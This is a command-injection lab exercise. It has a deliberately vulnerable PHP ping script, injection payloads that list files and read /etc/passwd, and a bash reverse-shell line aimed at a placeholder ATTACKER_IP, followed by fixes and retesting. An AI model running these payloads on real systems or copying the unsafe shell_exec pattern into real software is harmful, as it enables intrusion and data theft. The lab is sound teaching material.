Exercise 48: Command Injection via Input Fields

Objective

Learn how to exploit Command Injection vulnerabilities in web applications that execute system commands based on user input. Understand how to prevent these vulnerabilities through input validation, sanitization, and using secure APIs for system interactions.

---

Scenario

You are assessing a web application with a feature that allows users to check the availability of a domain by executing system commands. Due to improper input validation, attackers can inject additional commands, leading to unauthorized system access and data exposure.

---

Lab Setup

Prerequisites:

• Basic knowledge of PHP and Linux commands.
• XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
• A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

1. PHP Script with Command Injection Vulnerability
   • Create a file ping.php: <?php if (isset($_GET['host'])) { $host = $_GET['host']; $output = shell_exec("ping -c 1 " . $host); echo "<pre>$output</pre>"; } else { echo "<h2>Please provide a hostname.</h2>"; } ?> <h2>Ping a Host</h2> <form method="GET" action=""> Hostname: <input type="text" name="host" required> <button type="submit">Ping</button> </form>
2. Running the Application
   • Start the Apache server.
   • Place ping.php in the web server’s root directory (htdocs for XAMPP).
   • Open http://localhost/ping.php in your browser.

---

Exploitation Steps

Step 1: Injecting Malicious Commands

1. In the Hostname field, enter the following payload: 127.0.0.1; ls
2. Expected Result:
   • The server lists the files in the web directory.

Step 2: Accessing Sensitive Files

1. Enter the following payload: 127.0.0.1; cat /etc/passwd
2. Expected Result:
   • The content of the /etc/passwd file is displayed, revealing sensitive system information.

Step 3: Creating a Reverse Shell (Advanced)

1. Enter the payload (replace ATTACKER_IP and PORT): 127.0.0.1; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
2. Expected Result:
   • The attacker gains remote shell access to the server.

---

Solution and Prevention

Problem Analysis

• The application directly executes user input in system commands without validation, allowing attackers to inject arbitrary commands.

Fixing the Vulnerability

1. Input Validation
   • Validate input to allow only valid domain names: if (preg_match('/^[a-zA-Z0-9.-]+$/', $host)) { $output = shell_exec("ping -c 1 " . escapeshellarg($host)); echo "<pre>$output</pre>"; } else { echo "<h2>Invalid hostname.</h2>"; }
2. Avoid Using Shell Commands
   • Use safer functions like gethostbyname() instead of shell commands: $ip = gethostbyname($host); echo "<h2>IP Address: $ip</h2>";
3. Use Escaping Functions
   • Apply escapeshellarg() or escapeshellcmd() to sanitize inputs: $output = shell_exec("ping -c 1 " . escapeshellarg($host));
4. Limit Command Execution Privileges
   • Run the web server with the least privileges to minimize impact.
5. Disable Dangerous PHP Functions
   • Disable functions like exec(), shell_exec(), and system() in php.ini: disable_functions = exec, shell_exec, system, passthru

---

Testing After Fix

1. Attempt to inject 127.0.0.1; ls.
2. Expected Result:
   • The application rejects the input or safely executes the intended command.
3. Attempt advanced payloads like 127.0.0.1; cat /etc/passwd.
4. Expected Result:
   • The server prevents command execution and displays an error.

---

Conclusion

In this lab, you exploited Command Injection by injecting system commands through unsanitized input, gaining access to sensitive information. You also learned how to mitigate this risk by validating input, using secure functions, and restricting command execution.